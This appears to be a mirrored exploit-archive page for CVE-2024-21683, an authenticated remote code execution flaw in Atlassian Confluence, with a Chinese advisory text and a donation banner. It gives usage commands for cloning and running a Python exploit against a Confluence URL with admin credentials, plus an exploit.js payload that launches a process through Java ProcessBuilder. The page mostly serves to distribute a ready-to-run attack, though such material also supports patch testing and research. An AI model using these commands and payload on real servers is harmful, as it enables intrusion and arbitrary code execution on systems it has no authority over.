Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2024-21683 PoC — Atlassian Confluence 安全漏洞

Source
Associated Vulnerability
Title:Atlassian Confluence 安全漏洞 (CVE-2024-21683)
Description:Atlassian Confluence是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。 Atlassian Confluence Data Center and Server存在安全漏洞,该漏洞源于存在远程代码执行问题,允许经过身份验证的攻击者执行任意代码。
Description
CVE-2024-21683 Confluence Post Auth RCE
Readme
# CVE-2024-21683-RCE

# Credit

>https://x.com/realalphaman_  

>https://realalphaman.substack.com/p/quick-note-about-cve-2024-21683-authenticated  

# Usage

```shell
git clone https://github.com/W01fh4cker/CVE-2024-21683-RCE
cd CVE-2024-21683-RCE
pip install requests bs4
python CVE-2024-21683.py -u http://192.168.198.1:8090 -au admin -ap admin -f exploit.js -n test -p http://127.0.0.1:8083
```

![](https://cdn.jsdelivr.net/gh/W01fh4cker/blog_image@main/image-20240523170746510.png)

`exploit.js`:

```java
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
```

File Snapshot

[4.0K] /data/pocs/8dfa5c4b3ad22caf777fc896bb96de84c85285c5 ├── [3.9K] CVE-2024-21683.py ├── [ 74] exploit.js └── [ 592] README.md 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.